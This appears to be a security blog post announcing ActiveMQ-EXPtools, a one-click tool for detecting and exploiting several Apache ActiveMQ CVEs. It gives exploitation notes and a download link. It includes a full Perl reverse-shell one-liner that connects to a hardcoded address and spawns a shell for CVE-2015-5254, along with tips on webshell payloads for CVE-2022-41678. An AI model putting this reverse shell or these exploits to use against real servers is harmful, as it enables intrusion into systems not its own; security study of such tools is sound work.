ActiveMQ-EXPtools: One-Click Detection and Exploitation of All Apache ActiveMQ Vulnerabilities

ActiveMQ-EXPtools is a security utility that detects and exploits multiple Apache ActiveMQ CVEs, provides Perl reverse‑shell payloads for CVE‑2015‑5254, notes authentication requirements for CVE‑2022‑41678, and offers download links and references for further analysis.

Black & White Path
Black & White Path
Black & White Path
ActiveMQ-EXPtools: One-Click Detection and Exploitation of All Apache ActiveMQ Vulnerabilities

工具介绍

ActiveMQ-EXPtools supports detection and exploitation of Apache ActiveMQ vulnerabilities CVE-2015-5254, CVE-2016-3088, CVE-2022-41678, CVE-2023-46604, CVE-2024-32114, CVE-2026-34197.

漏洞利用说明

CVE-2015-5254

java-chains generates deserialization payloads; verification can use URLDNS.

For reverse shell, perl is preferred because sh and bash may fail.

/usr/bin/perl -e 'use Socket;$i="192.168.239.129";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

CVE-2022-41678

When writing a custom webshell, the IceSpear payload returns HTTP 500 while the Gozilla payload works normally.

The tool must include the appropriate authentication header when connecting.

Reference URLs:

https://github.com/URJACK2025/CVE-2022-41678

https://github.com/vulhub/vulhub

https://github.com/vulhub/java-chains

工具下载

https://github.com/Catherines77/ActiveMQ-EXPtools/releases/tag/1.0

Disclaimer: techniques are provided for security‑focused learning and must not be used for illegal or profit‑making purposes.

Information SecurityExploitActiveMQCVE-2015-5254CVE-2022-41678
Black & White Path
Written by

Black & White Path

We are the beacon of the cyber world, a stepping stone on the road to security.

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.